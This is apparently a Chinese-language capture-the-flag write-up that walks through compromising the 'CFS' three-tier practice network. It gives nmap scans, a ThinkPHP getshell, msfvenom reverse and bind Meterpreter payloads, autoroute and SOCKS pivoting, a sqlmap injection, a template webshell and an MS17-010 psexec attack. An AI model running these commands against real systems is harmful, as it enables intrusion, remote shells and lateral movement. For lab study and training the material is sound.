CFS三层靶机渗透

环境搭建

0x01. 环境下载：
【CFS三层靶机环境】百度网盘链接：
链接: https://pan.baidu.com/s/1LJueA-X02K7HZXr8QsOmeg
提取码: dkcp
解压密码：teamssix.com
0x02. 环境搭建：
1）设置虚拟机网卡（新建两个仅主机模式的网卡）
VMnet10: 子网IP：192.168.22.0 子网掩码：255.255.255.0
VMnet11: 子网IP：192.168.33.0 子网掩码：255.255.255.0

2）虚拟机网卡配置：
Target_1(两个网卡，一个桥接出网，另一个选择VMnet10，当作内网):

Target_2(两个网卡，一个选择VMnet10，另一个选择VMnet11，均为内网)

Target_3(一个网卡选择VMnet11)

3）网络拓扑图如下：

最终结果：实现两两互通，即Kali能ping通target1 ；target1能ping通target2 ； target2能ping通target3

0x03. 开启Web服务：
宝塔后台登陆地址及密码：

http://靶机外网ip:8888/a768f109/
账号：eaj3yhsl，密码：41bb8fee，根据靶机实际ip，配置即可，我的配置如下：

渗透测试

0x01. 针对Target_1信息搜集与渗透测试：
1）nmap扫描，得知开启80端口

nmap -sV -p 1-65535 -T4 192.168.0.119

2）访问http://192.168.0.119/public/，得知是TP框架

3）这里我们直接使用TP漏洞利用工具getshell

**注意：**linux下使用\转义$，windows下用^转义

4）蚁剑连接：

0x02. 针对Target_2信息搜集与渗透测试：
1）在Target_1的shell上面查看网络信息：发现其有两个网卡，还存在着192.168.22.xx网段

0x03. MSF上线Target_1：

1） MSF生成linux木马上传至Target_1

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.122 LPORT=4444 -f elf >shell.elf

2）MSF监听木马，等待上线

use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp 
show options
set LHOST 192.168.0.112
exploit

3）通过蚁剑在Target_1上上传木马并执行

4）MSF已成功接收会话

5）查看、添加路由规则：
获取当前的网段： run get_local_subnets

查看路由：run autoroute -p ，这里暂时为空

添加路由：run autoroute -s 192.168.22.0/24
再次查看路由：run autoroute -p

尝试ping 22网段，成功，说明路由添加成功

6）实现socks5代理

use auxiliary/server/socks_proxy 
options
set SRVHOST 192.168.0.122
set SRVPORT 2222
set version 4a
run

7）我们还得修改proxychains配置文件（proxychains是kali上自带的全局代理软件；windows下可以使用Proxifier_PE和SocksCap64-Portable）

vi /etc/proxychains4.conf
socks4 192.168.0.122 2222

0x04. 代理后的Target_1网段探测：
1）使用nmap扫描22网段

proxychains nmap -sT -Pn 192.168.22.0/24

这里扫出来了129及其端口：

2）这里开启了80口，我们浏览器挂代理访问一下：

3）是一个八哥CMS,通过查看源码发现Sql注入：

4）直接Sqlmap一把梭，得到账号密码：

proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --batch --delay 2

5）然后通过/robots.txt获取后台：

6）进入后台在模板处写入一句话getshell

7）使用蚁剑连接（这里蚁剑挂上代理）


8）至此，我们已经渗透到第二层网络，通过查看网络信息得知33网段

0x05. MSF上线Target_2：
1）通过msf创建后门建立连接，但是此处的后门要生成一个正向的后门

重点理解：
反向：我们拿下了target_2的web权限，如果我们上传的是反向的木马，那么target_2就要去寻找我们kali的路由，但是target_2主机中没有kali的路由，那么就会导致我们的反dshell失败
正向：我们生成了一个正向的木马，我们的kali攻击机就会去主动寻找target_2的服务器，这个时候我们应为做了一个socks的代理，我们的流量会通过kali的ip的1080端口代理给target_1，然后target1_中是存在239网段中的路由的，所以我们可以正常进行连接。

2）生成正向木马：

msfvenom -p linux/x64/meterpreter/bind_tcp lport=6666 -f elf >shell2.elf

3）msf 设置监听：

proxychains msfconsole
use exploit/multi/handler 
set payload linux/x64/meterpreter/bind_tcp
set lport 6666
set rhost 192.168.22.129
run

4）执行正向木马上线Msf


5）还是以前的 *** 作：

获取当前的网段： run get_local_subnets
查看路由：run autoroute -p 
添加路由：run autoroute -s 192.168.33.0/24
再次查看路由：run autoroute -p 

6）这里我们已经处于target_2的网络下，直接调用模块扫描33网段

use auxiliary/scanner/portscan/tcp
show options
set RHOSTS 192.168.33.0/24
exploit

7）扫描到目标主机为192.168.33.33，并且开放135和445端口，这里我们使用ms17-010来测试一下：

use auxiliary/scanner/smb/smb_ms17_010    // 检测ms17010

8）调用ms17-010模块攻击

use exploit/windows/smb/ms17_010_psexec
set payload windows/x64/meterpreter/bind_tcp   //设置正向连接
show options  //设置 set RHOST 192.168.33.33
exploit

9）成功拿到shell，搜索机器下的Flag：

C:\Users\Administrator>dir /b /s *.txt
type Desktop\flag.txt  //查看Flag值

10）至此，我们通过代理成功拿下了三层内网机器！

0x06. 总结

该靶场为典型的三层网络环境，通过利用MSF强大的路由功能，不断添加路由和socks代理，横向移动到最后一层网络！